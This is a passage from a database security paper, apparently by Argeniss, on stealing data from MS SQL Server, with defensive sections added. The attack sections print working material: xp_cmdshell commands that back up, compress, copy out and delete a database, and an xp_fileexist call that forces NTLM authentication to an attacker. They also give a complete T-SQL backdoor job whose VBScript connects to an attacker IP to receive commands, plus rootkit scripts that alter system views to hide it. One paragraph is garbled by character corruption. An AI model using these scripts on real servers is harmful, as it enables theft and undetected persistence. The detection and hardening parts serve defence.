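Both scripts above depend on Java stored procedures that reach the operating system and the network, so an inventory of such wrappers is a practical control. The following Python example, added here and not part of the paper, classifies Java source text by capability (OS command execution, sockets, file writes) and joins it to the PL/SQL call specifications that expose each class; the source texts are constructed abbreviations of the paper's classes plus a harmless one, standing in for DBA_SOURCE rows.

```python
"""Inventory of Java stored procedures that reach the OS or the network, the path the
export-and-zip.sql and send-zip.sql scripts above rely on.  Added example, not part of the
paper; the source texts below are constructed abbreviations of the paper's classes plus a
harmless one, standing in for DBA_SOURCE rows."""
import re

# Capability signatures in Java source text (constructed list; extend per site).
CAPABILITIES = {
    "os-exec": re.compile(r"Runtime\s*\.\s*getRuntime\s*\(\s*\)\s*\.\s*exec\b|\bProcessBuilder\b"),
    "network": re.compile(r"\bjava\.net\b|\bnew\s+Socket\s*\("),
    "file-write": re.compile(r"\bFileWriter\b|\bFileOutputStream\b"),
}
# PL/SQL call specification: ... AS LANGUAGE JAVA NAME 'Class.method (args)'
WRAPPER_RX = re.compile(r"LANGUAGE\s+JAVA\s+NAME\s+'([A-Za-z_$][\w$.]*)\s*\(", re.IGNORECASE)


def classify_java_source(text):
    """Set of capability labels a Java source exhibits."""
    return {label for label, rx in CAPABILITIES.items() if rx.search(text)}


def java_target(plsql_text):
    """'Class.method' named by a PL/SQL Java wrapper, or None for ordinary PL/SQL."""
    m = WRAPPER_RX.search(plsql_text)
    return m.group(1) if m else None


def exposed_java_capabilities(java_sources, plsql_procs):
    """Join Java sources to the PL/SQL procedures that expose them.
    java_sources: {name: text} from DBA_SOURCE rows with TYPE = 'JAVA SOURCE'.
    plsql_procs:  {owner.proc: text} from DBA_SOURCE rows with TYPE = 'PROCEDURE'.
    Returns sorted (owner.proc, class, [capabilities]) for wrappers whose class runs OS
    commands, opens sockets or writes files; harmless classes are omitted."""
    caps_by_class = {}
    for text in java_sources.values():
        m = re.search(r"\bclass\s+(\w+)", text)
        if m:
            caps_by_class[m.group(1)] = classify_java_source(text)
    out = []
    for proc, text in plsql_procs.items():
        target = java_target(text)
        if target is None:
            continue
        cls = target.split(".")[0]
        caps = caps_by_class.get(cls, set())
        if caps:
            out.append((proc, cls, sorted(caps)))
    return sorted(out)


# --- constructed sample data -----------------------------------------------------------
JAVA_SOURCES = {
    "SRC_EXECUTEOS": ("import java.io.*; public class ExecuteOS { void a(File f, String cmd) "
                      "throws Exception { FileWriter fw = new FileWriter(f); fw.close(); "
                      "Process p = Runtime.getRuntime().exec(cmd); p.waitFor(); } }"),
    "SRC_FILESEND": ("import java.net.*; public class FileSend { void s(String h, int p) "
                     "throws Exception { Socket sock = new Socket(h, p); sock.close(); } }"),
    "SRC_GREETER": "public class Greeter { public static String hi(String n) { return n; } }",
}
PLSQL_PROCS = {
    "SCOTT.PROC_EXECUTEOS": ("PROCEDURE \"PROC_EXECUTEOS\" (p_command varchar2) AS LANGUAGE "
                             "JAVA NAME 'ExecuteOS.execOSCmd (java.lang.String)';"),
    "SCOTT.PROC_FILESEND": ("PROCEDURE \"PROC_FILESEND\" (f varchar2, h varchar2, p PLS_INTEGER) "
                            "AS LANGUAGE JAVA NAME 'FileSend.fileSend (java.lang.String, "
                            "java.lang.String, int)';"),
    "HR.PROC_GREET": "PROCEDURE \"PROC_GREET\" (n varchar2) AS LANGUAGE JAVA NAME 'Greeter.hi (java.lang.String)';",
    "HR.PROC_PLAIN": "PROCEDURE \"PROC_PLAIN\" AS BEGIN NULL; END;",
}

if __name__ == "__main__":
    for proc, cls, caps in exposed_java_capabilities(JAVA_SOURCES, PLSQL_PROCS):
        print(f"{proc} -> {cls}: {', '.join(caps)}")
```

Pair the inventory with a review of who holds the Java permissions that make these calls possible at run time (for example the JAVASYSPRIV role and DBA_JAVA_POLICY grants); a wrapper over a capable class is only reachable if its owner has them.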
M$ $%& $er'er attacks:
'et*s see some attac"s for %S S&' Server.
%tea!ing a com!ete database from &nternet:
Stealing a comlete database is not big deal once you get access to the database server and
you have enough rivileges, you only have to run the ne#t sentences$
--Backup the database
BACKUP DATABASE databasename TO DISK ='c:\!nd"s\temp\"ut#dat'
--C"mp$ess the %!&e '("u d"n't ant a )*b %!&e+
E,EC -p.cmdshe&& 'makecab c:\!nd"s\temp\"ut#dat c:\!nd"s\temp\"ut#cab'
--/et the backup b( c"p(!n* !t t" ("u$ c"mpute$#
E,EC -p.cmdshe&& 'c"p( c:\!nd"s\temp\"ut#cab \\("u$!p\sha$e'
--O$ b( an( "the$ a( 't%tp0 %%tp0 http0 ema!&0 etc#+
--E$ase the %!&es
E,EC -p.cmdshe&& 'de& c:\!nd"s\temp\"ut#dat c:\!nd"s\temp\"ut#cab'
!he revious sentences could be e#ecuted by e#loiting S&' injection in a web alication if
0150 www.argeniss.com
Argeniss – Information Security
the web alication has enough rivileges which is not uncommon, *sa* or other administrative
account are often used by web develoers to connect to %S S&' Server.
Data can be comressed .0$. or more, so .Hb database will be .00%b so it*s not difficult to
steal big amounts of data.
Stealing data with a couple of clicks:
There is this old tool called DataThief, it's just a pretty basic PoC I built in 2002, yes it's 5 years old; what is amazing is that it still works, and that's the reason why it's mentioned here: to show how a simple and old tool can be easily used to steal data by just pointing and clicking.
This tool exploits SQL Injection and it works even if you can't get results or errors back from the web application. It uses a technique that won't be detailed here but you can look at [4] for full details; basically it makes the attacked web application's backend SQL Server connect to an attacker SQL Server and copy all available data. It uses OpenRowset functionality, so there is no need for elevated privileges; on SQL Server 2000 it's enabled by default, on SQL Server 2005 it's not enabled by default, but if the functionality has been enabled because of specific needs then it can be abused. In order for this tool to work the backend SQL Server must be able to connect to the attacker's SQL Server.
This is a point and click tool, very easy to use, that unfortunately has been used by bad guys to steal data; that's the reason why it was taken off line some time ago.
To use the tool you first need to have your own (or not) MS SQL Server where the tool will copy the available data. You have to set up the connection parameters at the very top of the tool, then you need to find a SQL injection entry point in a web application and set the URL and parameters, adding <***> where SQL statements will be automatically injected. You also have to set the HTTP method used to send the data to the web application; after that you only need to start clicking and you will get all the data available.
This tool is available together with this paper and it has a help document that gives more details on how to use it.
Stealing SQL Server account credentials and using them to connect back to SQL Server:
As you may know MS SQL Server supports Windows NTLM authentication. NTLM authentication and NTLM weaknesses won't be detailed here, you can look at [5] for details. The NTLM challenge-response mechanism is vulnerable to MITM attacks because by default all Windows versions use a weak configuration, so we can exploit this to launch an attack that will allow us to connect to MS SQL Server as the user account under which the SQL Server service is running, which is always a sysadmin login on SQL Server. Logically this attack won't work if SQL Server is running under the LocalSystem account, because it can't authenticate to remote systems, but don't worry, because running SQL Server under the LocalSystem account is not a good security practice and it is not recommended by Microsoft.
We can force SQL Server to connect to us (the attacker) and try to authenticate (xp_fileexist can be executed by any database user):
exec master.dbo.xp_fileexist '\\YourIP\share'
That sentence will cause SQL Server to try to authenticate to the remote computer as its service account, which has sysadmin database privileges.
By using this NTLM MITM attack, we can use SQL Server credentials to connect back to SQL Server as sysadmin and own the database server (and then own the Windows server of course, but that's another topic).
The next is a basic NTLM authentication schema:

   Client  ---- connects --------------->  Server
   Client  <--- sends challenge ---------  Server
   Client  ---- sends response --------->  Server
   Client  <--- authenticates -----------  Server

The next represents a simple SQL Server NTLM authentication MITM attack:

   (Attacker)                                   (SQL Server)
a) Client  ---- connects ------------------->  Server
b) Client  <--- sends challenge (c) ---------  Server
1) Client  ---- forces to connect ---------->  Server
2) Client  <--- connects --------------------  Server
3) Client  ---- sends challenge (c) -------->  Server
4) Client  <--- sends response (r) ----------  Server
c) Client  ---- sends response (r) --------->  Server
d) Client  <--- authenticates ---------------  Server

Let's detail this attack a bit, in a simple way. First the client (attacker) will try to connect and authenticate to the server (SQL Server) using NTLM authentication; the server will send a challenge (c) to the client. The client must use that challenge and send the proper response in order to successfully log in, but instead of doing that the client holds on to this authentication and forces the server to connect to the client, so the server will try to authenticate to the client (the client must be previously logged in to SQL Server under a low privileged account; exploiting SQL injection could work too in some circumstances, without the need to authenticate to SQL Server). The client will send the same challenge (c) that it previously got from the server, the server will send a response (r) to the client, and finally the client will use that response (r) on the authentication that was held on, and the client will successfully authenticate to the server as the server service account, a database administrator account.
This attack is implemented by our Maguro tool (by JP), available together with this paper, which consists of a couple of Python scripts; currently this tool only works with Windows 2000, we are still working to support Windows 2003.
Extracts from MAGURO-README.txt:
...
Maguro tunnels a TDS/SQL connection to a target SQL server for a non privileged user.
The tunnel juggles with the NTLMSSP packets contained in the TDS/SQL connection, and escalates privileges to the ones of the account the SQL server is running as (it won't work if SQL Server is running under Local System account), using the already well known and documented MITM attack to NTLM authentication which has existed for several years now (first detailed information I remember comes from smbrelay's author, Sir Dystic of CULT OF THE DEAD COW [0]).
To do so, it forces the target SQL server to connect and authenticate itself to the attacker's machine.
...
Stealing data using a rootkit and backdoor:
After compromising a SQL Server it's always nice to have a way to keep having access without being detected, so you can continue stealing data forever.
We can insert a backdoor in SQL Server by creating a Job and scheduling it to connect to us at any given time, allowing us to execute any command and get the results back. The Job executes VBScript code that connects to the attacker using HTTP (HTTPS could be used to bypass IDS). The attacker uses Netcat and sends commands in the Date HTTP header.
Let's see the code:
BEGIN TRANSACTION
DECLARE @ReturnCode INT
SELECT @ReturnCode = 0
IF NOT EXISTS (SELECT name FROM msdb.dbo.syscategories WHERE name=N'[Uncategorized (Local)]' AND category_class=1)
BEGIN
EXEC @ReturnCode = msdb.dbo.sp_add_category @class=N'JOB', @type=N'LOCAL', @name=N'[Uncategorized (Local)]'
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
END
DECLARE @jobId BINARY(16)
--Here the Job named backD00r is added
EXEC @ReturnCode = msdb.dbo.sp_add_job @job_name=N'backD00r',
@enabled=1,
@notify_level_eventlog=0,
@notify_level_email=0,
@notify_level_netsend=0,
@notify_level_page=0,
@delete_level=0,
@description=N'No description available.',
@category_name=N'[Uncategorized (Local)]',
@owner_login_name=N'', @job_id = @jobId OUTPUT
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
--Here we schedule the Job to run when we want
EXEC msdb.dbo.sp_add_jobschedule @job_id=@jobId, @name=N'1',
@enabled=1,
@freq_type=4,
@freq_interval=1,
@freq_subday_type=1,
@freq_subday_interval=0,
@freq_relative_interval=0,
@freq_recurrence_factor=1,
@active_start_date=0, -- date when the job will run, yyyymmdd format
@active_end_date=99991231,
@active_start_time=95400, -- time when the job will run, hhmmss format
@active_end_time=235959
-- here we add a Job step with the vbscript code
EXEC @ReturnCode = msdb.dbo.sp_add_jobstep @job_id=@jobId, @step_name=N'1',
@step_id=1,
@cmdexec_success_code=0,
@on_success_action=1,
@on_success_step_id=0,
@on_fail_action=2,
@on_fail_step_id=0,
@retry_attempts=0,
@retry_interval=0,
@os_run_priority=0, @subsystem=N'ActiveScripting',
@command=N'port = 80
httpserver = "http://192.168.1.15" ''change for attacker ip, using https will bypass IDS
sqlserver = "." ''change for server instance name if it is a named instance
command = ""
on error resume next
set rds = createobject("rds.dataspace") ''some trick to be able to use XMLHTTP :)
Set http = rds.CreateObject("Msxml2.XMLHTTP","")
if not CheckError then
do while ucase(trim(command))<>"EXIT"
http.open "HEAD", httpserver & ":" & port, FALSE
http.send outtext & vbcrlf & vbcrlf
outtext=""
if not CheckError then
command= http.getResponseHeader("Date")
if ucase(trim(command))<>"EXIT" then
Set Conn = CreateObject("ADODB.Connection")
Set Rec = CreateObject("ADODB.Recordset")
if not CheckError then
conn.open "provider=sqloledb;server=" & sqlserver & ";trusted_connection=yes;"
rec.open command, conn
if not CheckError then
for i=0 to rec.fields.count -1
if outtext<>"" then outtext= outtext & vbtab
outtext= outtext & rec.fields(i).name
next
outtext= outtext & vbcrlf & rec.getstring(,,vbtab,vbcrlf,"")
if CheckError then outtext= err.description
else
outtext= err.description
end if
else
outtext= err.description
end if
end if
end if
loop
end if
set conn=nothing
set rec=nothing
set http=nothing
function CheckError
if err=0 then
CheckError=False
else
CheckError=True
err=0
end if
end function
',
@database_name=N'VBScript', @flags=0
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
EXEC @ReturnCode = msdb.dbo.sp_update_job @job_id = @jobId, @start_step_id = 1
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
EXEC @ReturnCode = msdb.dbo.sp_add_jobserver @job_id = @jobId, @server_name = N'(local)'
IF (@@ERROR <> 0 OR @ReturnCode <> 0) GOTO QuitWithRollback
COMMIT TRANSACTION
GOTO EndSave
QuitWithRollback:
IF (@@TRANCOUNT > 0) ROLLBACK TRANSACTION
EndSave:
The above code will first create a Job, then it will schedule the Job to run whenever you want, and finally it will add a Job step with the VBScript that will connect to the attacker over HTTP, read a command from the Date HTTP header and return the results back, and so on until the "exit" command is read.
If you want to run the Job just after you create it you can execute the next:
EXEC msdb.dbo.sp_start_job @job_name=N'backD00r'
Very nice, isn't it?
That's not all, we need to hide what we just added so database administrators won't notice a new Job has been created nor when it's running. We can do this with a database rootkit: SQL Server tools query system views to get information about the database objects in order to display them, so we can modify these views so the objects we added are not returned by the queries nor displayed.
The next T-SQL code must be run in order to install the rootkit:
----------------------------------------------------------------------
--
-- Script for SQL Server 2005 to install rootkit to hide backdoor
-- running as a job, adding "(jobs.name<>'backD00r') AND" in where clause
--
----------------------------------------------------------------------
use msdb;
exec sp_executesql N'
ALTER VIEW sysjobs_view
AS
SELECT jobs.job_id,
svr.originating_server,
jobs.name,
jobs.enabled,
jobs.description,
jobs.start_step_id,
jobs.category_id,
jobs.owner_sid,
jobs.notify_level_eventlog,
jobs.notify_level_email,
jobs.notify_level_netsend,
jobs.notify_level_page,
jobs.notify_email_operator_id,
jobs.notify_netsend_operator_id,
jobs.notify_page_operator_id,
jobs.delete_level,
jobs.date_created,
jobs.date_modified,
jobs.version_number,
jobs.originating_server_id,
svr.master_server
FROM msdb.dbo.sysjobs as jobs
JOIN msdb.dbo.sysoriginatingservers_view as svr
ON jobs.originating_server_id = svr.originating_server_id
--LEFT JOIN msdb.dbo.sysjobservers js ON jobs.job_id = js.job_id
WHERE (jobs.name<>''backD00r'') AND ( (owner_sid = SUSER_SID())
OR (ISNULL(IS_SRVROLEMEMBER(N''sysadmin''), 0) = 1)
OR (ISNULL(IS_MEMBER(N''SQLAgentReaderRole''), 0) = 1)
OR ( (ISNULL(IS_MEMBER(N''TargetServersRole''), 0) = 1) AND
(EXISTS(SELECT * FROM msdb.dbo.sysjobservers js
WHERE js.server_id <> 0 AND js.job_id = jobs.job_id)))) -- filter out local jobs'
----------------------------------------------------------------------
--
-- Script for SQL Server 2005 to install rootkit to hide schedule
-- for the backdoor job, adding "AND sched.name<>'1'" in where clause
--
----------------------------------------------------------------------
use msdb;
exec sp_executesql N'
ALTER VIEW sysschedules_localserver_view
AS
SELECT sched.schedule_id,
sched.schedule_uid,
sched.originating_server_id,
sched.name,
sched.owner_sid,
sched.enabled,
sched.freq_type,
sched.freq_interval,
sched.freq_subday_type,
sched.freq_subday_interval,
sched.freq_relative_interval,
sched.freq_recurrence_factor,
sched.active_start_date,
sched.active_end_date,
sched.active_start_time,
sched.active_end_time,
sched.date_created,
sched.date_modified,
sched.version_number,
svr.originating_server,
svr.master_server
FROM msdb.dbo.sysschedules as sched
JOIN msdb.dbo.sysoriginatingservers_view as svr
ON sched.originating_server_id = svr.originating_server_id
WHERE (svr.master_server = 0) AND sched.name<>''1''
AND ( (sched.owner_sid = SUSER_SID())
OR (ISNULL(IS_SRVROLEMEMBER(N''sysadmin''), 0) = 1)
OR (ISNULL(IS_MEMBER(N''SQLAgentReaderRole''), 0) = 1)
)'
After running the above code the Job we previously created will be hidden from MS SQL Server tools. We will continue having access without being noticed by database administrators.
After we have done all we want with the database server, or if we are tired of owning the server, we can remove the rootkit with the next T-SQL code:
----------------------------------------------------------------------
--
-- Script for SQL Server 2005 to uninstall rootkit that hides backdoor
-- running as a job, removing "(jobs.name<>'backD00r') AND" in where clause
--
----------------------------------------------------------------------
use msdb;
exec sp_executesql N'
ALTER VIEW sysjobs_view
AS
SELECT jobs.job_id,
svr.originating_server,
jobs.name,
jobs.enabled,
jobs.description,
jobs.start_step_id,
jobs.category_id,
jobs.owner_sid,
jobs.notify_level_eventlog,
jobs.notify_level_email,
jobs.notify_level_netsend,
jobs.notify_level_page,
jobs.notify_email_operator_id,
jobs.notify_netsend_operator_id,
jobs.notify_page_operator_id,
jobs.delete_level,
jobs.date_created,
jobs.date_modified,
jobs.version_number,
jobs.originating_server_id,
svr.master_server
FROM msdb.dbo.sysjobs as jobs
JOIN msdb.dbo.sysoriginatingservers_view as svr
ON jobs.originating_server_id = svr.originating_server_id
--LEFT JOIN msdb.dbo.sysjobservers js ON jobs.job_id = js.job_id
WHERE (owner_sid = SUSER_SID())
OR (ISNULL(IS_SRVROLEMEMBER(N''sysadmin''), 0) = 1)
OR (ISNULL(IS_MEMBER(N''SQLAgentReaderRole''), 0) = 1)
OR ( (ISNULL(IS_MEMBER(N''TargetServersRole''), 0) = 1) AND
(EXISTS(SELECT * FROM msdb.dbo.sysjobservers js
WHERE js.server_id <> 0 AND js.job_id = jobs.job_id))) -- filter out local jobs'
----------------------------------------------------------------------
--
-- Script for SQL Server 2005 to uninstall rootkit that hides schedule
-- for the backdoor job, removing "AND sched.name<>'1'" in where clause
--
----------------------------------------------------------------------
use msdb;
exec sp_executesql N'
ALTER VIEW sysschedules_localserver_view
AS
SELECT sched.schedule_id,
sched.schedule_uid,
sched.originating_server_id,
sched.name,
sched.owner_sid,
sched.enabled,
sched.freq_type,
sched.freq_interval,
sched.freq_subday_type,
sched.freq_subday_interval,
sched.freq_relative_interval,
sched.freq_recurrence_factor,
sched.active_start_date,
sched.active_end_date,
sched.active_start_time,
sched.active_end_time,
sched.date_created,
sched.date_modified,
sched.version_number,
svr.originating_server,
svr.master_server
FROM msdb.dbo.sysschedules as sched
JOIN msdb.dbo.sysoriginatingservers_view as svr
ON sched.originating_server_id = svr.originating_server_id
WHERE (svr.master_server = 0)
AND ( (sched.owner_sid = SUSER_SID())
OR (ISNULL(IS_SRVROLEMEMBER(N''sysadmin''), 0) = 1)
OR (ISNULL(IS_MEMBER(N''SQLAgentReaderRole''), 0) = 1)
)'
After removing the rootkit we can remove the backdoor:
----------------------------------------------------------------------
--
-- Script for SQL Server 2005 to uninstall backdoor
--
----------------------------------------------------------------------
DECLARE @jobId BINARY(16)
select @jobId=job_id FROM msdb.dbo.sysjobs where name='backD00r'
EXEC msdb.dbo.sp_delete_job @job_id=@jobId, @delete_unused_schedule=1
After removing the rootkit and backdoor the database server will continue running without problems. Instead of removing the rootkit and backdoor you can just disable the job schedule and enable it when you need it, because you don't have to worry about the backdoor being detected, unless some smart database administrators read the next :)
To detect if this rootkit is installed it's as easy as directly querying the msdb.dbo.sysjobs and msdb.dbo.sysschedules tables and comparing the results with the ones displayed by MS SQL Server tools.
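The comparison described above, written out as T-SQL for SQL Server 2005. This is an added example, not code from the original paper: the msdb objects and columns it reads are the real ones the rootkit modifies, while the finding labels and the subsystem/command heuristics in the last query are my own.

```sql
-- Added example, not part of the original paper. Run it as a member of
-- sysadmin: the views already filter by job/schedule ownership, so a lower
-- privileged login would see differences that are not caused by a rootkit.
USE msdb;

-- 1. Jobs that exist in the base table but are missing from the view the
--    SQL Server tools query (this is exactly what the rootkit above does).
SELECT j.job_id, j.name, N'job hidden from sysjobs_view' AS finding
FROM msdb.dbo.sysjobs AS j
WHERE NOT EXISTS (SELECT 1 FROM msdb.dbo.sysjobs_view AS v
                  WHERE v.job_id = j.job_id);

-- 2. Same check for schedules.
SELECT s.schedule_id, s.name, N'schedule hidden from local view' AS finding
FROM msdb.dbo.sysschedules AS s
WHERE NOT EXISTS (SELECT 1 FROM msdb.dbo.sysschedules_localserver_view AS v
                  WHERE v.schedule_id = s.schedule_id);

-- 3. The views themselves. ALTER VIEW bumps modify_date, and the rootkit
--    adds a comparison against a literal name (.name<>'...') that the
--    shipped definitions do not contain. A modify_date that matches a
--    service pack install is expected; one that does not is a finding.
SELECT o.name, o.create_date, o.modify_date,
       CASE WHEN m.definition LIKE '%.name<>''%' THEN N'literal name filter in WHERE'
            ELSE N'definition changed' END AS finding
FROM msdb.sys.objects AS o
JOIN msdb.sys.sql_modules AS m ON m.object_id = o.object_id
WHERE o.name IN (N'sysjobs_view', N'sysschedules_localserver_view')
  AND (o.modify_date > o.create_date OR m.definition LIKE '%.name<>''%');

-- 4. Job steps that can run arbitrary code, with the start of their command.
--    The backdoor is an ActiveScripting step whose script contains an http URL;
--    the LIKE patterns are a hunting heuristic, expect some benign hits.
SELECT j.name AS job_name, st.step_id, st.subsystem,
       LEFT(st.command, 200) AS command_head
FROM msdb.dbo.sysjobs AS j
JOIN msdb.dbo.sysjobsteps AS st ON st.job_id = j.job_id
WHERE st.subsystem IN (N'ActiveScripting', N'CmdExec')
   OR st.command LIKE '%http%'
   OR st.command LIKE '%xp_cmdshell%';
```

Run it from a plain connection (sqlcmd or osql) rather than through the Management Studio object browser, since the tools are exactly what the rootkit targets. Queries 1 and 2 compare each base table with its view, query 3 looks at the view objects themselves, and query 4 finds the backdoor step whatever the job is called. Because a service pack also replaces msdb views, compare modify_date with your patch history, which is the "check database system objects against changes" routine from the protection section below.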
We have seen some pretty cool attacks; we are constantly researching and finding new attacks and vulnerabilities in database servers. For more exploits, advisories, research papers, etc. related to database security you can look at [6].
How to Protect against attacks:
Let's see now how you can protect your databases against attacks.
Set a good password policy:
Use strong passwords, educate users to use pass phrases, they are easy to remember and hard to crack. Implement a policy where password reuse is not allowed, login lockdown after x failed login attempts, passwords must be changed every x days, etc.
Keep up to date with security patches:
Try to install patches as fast as you can, database vulnerabilities are serious, sometimes your database server can be easily compromised with a simple query.
Always test patches for some time on non production servers first and monitor for patch problems on mailing lists. Sometimes patches could open holes (hello Mr Oracle) instead of fixing them.
Protect database server by firewall:
Allow connections only from trusted hosts. Block all non used ports and block all outbound connections: why would the database server need to connect to a host or the Internet? You can set exceptions for replication, linked databases, etc. Blocking outbound connections also breaks the backup copy, the DataThief data push and the forced NTLM authentication shown above, all of which need the database server to reach the attacker.
Disable all non used functionality:
Some database servers have all functionality enabled by default, you can use hardening guides from trusted parties to disable non used functionality, remember to test on non production servers first.
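As an added example (not from the original paper), the SQL Server 2005 switches for the two features the attacks in this paper rely on, followed by the check that belongs in a periodic configuration review. The option names are the real sp_configure options; the comments are mine.

```sql
-- Added example, not part of the original paper: SQL Server 2005 switches
-- for the two features the attacks above depend on. xp_cmdshell ran
-- makecab/copy/del on the stolen backup; 'Ad Hoc Distributed Queries'
-- controls OPENROWSET/OPENDATASOURCE with a connection string, which is
-- what DataThief uses to push the data to the attacker's SQL Server.
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 0;
EXEC sp_configure 'Ad Hoc Distributed Queries', 0;
RECONFIGURE;

-- Verify (value_in_use must be 0 for both). Keep this SELECT in the
-- periodic configuration check: a sysadmin, or an injected query running
-- as one, can re-enable either feature with the same two EXEC lines.
SELECT name, value, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ad Hoc Distributed Queries');
```

On SQL Server 2000 neither option exists: there xp_cmdshell is restricted by revoking EXECUTE on master.dbo.xp_cmdshell from public, and ad hoc OPENROWSET connections through a given OLE DB provider are blocked by setting that provider's DisallowAdhocAccess registry value to 1. In both versions the cleanest fix for the web application case is a login that is not sysadmin, since then the injected query cannot call xp_cmdshell in the first place (unless a proxy account has been set up for it).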
Use encryption:
At network level: use SSL, database proprietary protocols.
At file level: file and file system encryption (backups, data files, etc.)
At database level: column encryption (database encryption APIs, third party solutions)
Periodically check for object and system permissions:
Check views, stored procedures, tables, etc. permissions. Check file, folder, registry, etc. permissions. Changes in permissions could mean a compromise or a mis-configuration.
Periodically check for new database installations:
Third party products can install database servers, and these newly installed servers could be installed with blank or weak passwords, un-patched, mis-configured, etc. Detect new database installations and secure or remove them.
Periodically check for users with database administration privileges:
This helps to detect intrusions, elevation of privileges, etc.
Periodically check database configuration and settings:
If security configurations or settings are changed, for instance by a system upgrade, patch, etc., your databases could be open to attack. If they change and there wasn't a system upgrade then it could mean a compromise.
Periodically check database system objects against changes:
If you detect a change in a system object and you haven't applied a fix or upgrade to your database server it could mean that a rootkit is present.
Periodically audit your web applications:
Audit your web applications for SQL injection, mis-configurations, weak permissions, etc. Also remember to use low privileged users to connect to database servers; if the application is vulnerable to SQL Injection, attacks could be limited.
Run database services under low privileged accounts:
If database services are compromised then OS compromise could be a bit more difficult.
Log as much as possible:
Periodically check logs for events such as:
● Failed logins.
● Incorrect SQL syntax.
● Permissions errors.
● Etc.
The presence of those events could mean your database was or is being attacked.
Monitor user activities and accesses:
If users know that they are not monitored, they could feel free to hack database servers and not be caught.
Build a database server honeypot:
By using a database server honeypot you can detect database attacks in your organization at an early stage; it will help you to detect and prevent internal and external attacks, since usually attackers will go first for the low hanging fruit. In order to set up a database honeypot you can follow the next steps:
● Isolate the server
   ○ All outbound connections should be blocked.
● Set it to log everything, run traces and set alerts.
● Set up other services to create a realistic environment.
● Set blank or easily guessable passwords.
● Make the server look interesting
   ○ You can link it from production servers.
   ○ Set it an interesting name like CreditCardServer, FinancialServer, etc.
   ○ Create databases with names like CreditCards, CustomersInfo, etc.
   ○ Create tables with fake data that seems real.
Build a home made IDS/IPS:
On sensitive database servers, depending on available functionality, you can build a simple IDS/IPS by setting database alerts to get notifications or to perform some actions when some errors occur:
● Failed login attempts.
● Incorrect SQL syntax.
● UNION statement errors.
● Permissions errors.
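The alerts described in this section and in the honeypot's "set alerts" step, as SQL Server Agent alerts for SQL Server 2005. This is an added example, not code from the original paper: the stored procedures, parameters and error numbers are real, while the operator name, alert names and e-mail address are made up.

```sql
-- Added example, not part of the original paper: the "home made IDS/IPS"
-- as SQL Server Agent alerts on the four errors listed above. Operator
-- and alert names and the e-mail address are invented.
USE msdb;

-- Operator that receives the notifications (Database Mail must be set up
-- for e-mail delivery; net send and pager are the other methods).
EXEC msdb.dbo.sp_add_operator @name = N'DBA on call', @enabled = 1,
     @email_address = N'dba-oncall@example.com';

-- @severity = 0 means "match this message_id". @delay_between_responses
-- (seconds) keeps one scanner from generating thousands of mails.
--   18456 login failed                102 incorrect syntax
--     205 UNION column count mismatch (typical of UNION-based injection)
--     229 permission denied on an object
EXEC msdb.dbo.sp_add_alert @name = N'IDS: failed login',
     @message_id = 18456, @severity = 0, @enabled = 1, @delay_between_responses = 60;
EXEC msdb.dbo.sp_add_alert @name = N'IDS: syntax error',
     @message_id = 102, @severity = 0, @enabled = 1, @delay_between_responses = 60;
EXEC msdb.dbo.sp_add_alert @name = N'IDS: UNION error',
     @message_id = 205, @severity = 0, @enabled = 1, @delay_between_responses = 60;
EXEC msdb.dbo.sp_add_alert @name = N'IDS: permission denied',
     @message_id = 229, @severity = 0, @enabled = 1, @delay_between_responses = 60;

-- @notification_method: 1 = e-mail, 2 = pager, 4 = net send (bit mask).
EXEC msdb.dbo.sp_add_notification @alert_name = N'IDS: failed login',
     @operator_name = N'DBA on call', @notification_method = 1;
EXEC msdb.dbo.sp_add_notification @alert_name = N'IDS: syntax error',
     @operator_name = N'DBA on call', @notification_method = 1;
EXEC msdb.dbo.sp_add_notification @alert_name = N'IDS: UNION error',
     @operator_name = N'DBA on call', @notification_method = 1;
EXEC msdb.dbo.sp_add_notification @alert_name = N'IDS: permission denied',
     @operator_name = N'DBA on call', @notification_method = 1;

-- Agent alerts only fire for errors written to the Windows application log.
-- 18456 is logged whenever failed-login auditing is on (the default); the
-- other three are not logged by default, so check is_event_logged and turn
-- logging on where it is 0.
SELECT message_id, is_event_logged
FROM sys.messages
WHERE message_id IN (102, 205, 229, 18456) AND language_id = 1033;
EXEC sp_altermessage 102, 'WITH_LOG', 'TRUE';
EXEC sp_altermessage 205, 'WITH_LOG', 'TRUE';
EXEC sp_altermessage 229, 'WITH_LOG', 'TRUE';
```

Two caveats. First, sp_altermessage was originally limited to user-defined messages (IDs above 50000); on a SQL Server 2005 build that rejects the system message IDs above, those three alerts cannot fire, and a server-side trace filtered on the same error numbers is the fallback (the honeypot's "run traces" step). Second, for the "P" in IPS, sp_add_alert also takes @job_name, so an alert can start a job that, for example, disables the offending login; test that on a non production server first, because a syntax error alert that disables logins is an easy denial of service against your own application.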
Protect your data as you protect your money!!!!!!!:
Be smart, think about it: if you lose data you lose money.
Use third party tools:
If your company has few database servers then it's not a big deal to manually audit them, build some basic tools, etc., but when you have dozens of database servers it gets complicated, so it's recommended that you use third party tools for:
● Encryption.
● Vulnerability assessment.
● Auditing.
● Monitoring, intrusion prevention, etc.
Train IT staff on database security:
If your staff doesn't know what database security is then all the tools and best protection in the world won't help you much. Staff must be trained and learn in order to get database security.
Ask for specialized professional services:
Security companies specialized in database security with a proven track record on database research are far better than all purpose security companies.
Conclusion:
As we just saw, the data theft threat is real. Stealing data is pretty simple if you know how to do it, and the bad guys are learning fast: they are investing and building attack tools while companies seem to be sleeping and giving their data away for free. One simple mistake can lead to database compromise. If you don't protect your databases sooner or later you will get hacked, and this means a lot of money lost and, in the worst case, going out of business. Perimeter defense is not enough, you must protect your databases, making strong investments in database protection.
Spam:
If you need information security services don't do as Oracle, contact us.
Don't be like Oracle, hack your own servers before someone else does it!
Check out Argeniss Ultimate 0day Exploits Pack
http://www.argeniss.com/products.html
References:
[1] The high cost of data loss
http://www.informationweek.com/security/showArticle.jhtml?articleID=183700367&pgno=1
[2] Privacy Rights Clearinghouse
http://www.privacyrights.org/
[3] How much are your personal details worth?
http://www.turbulence.org/Works/swipe/calculator.html
http://www.bankrate.com/brm/news/pf/20060221b1.asp
[4] Manipulating MS SQL Server using SQL Injection
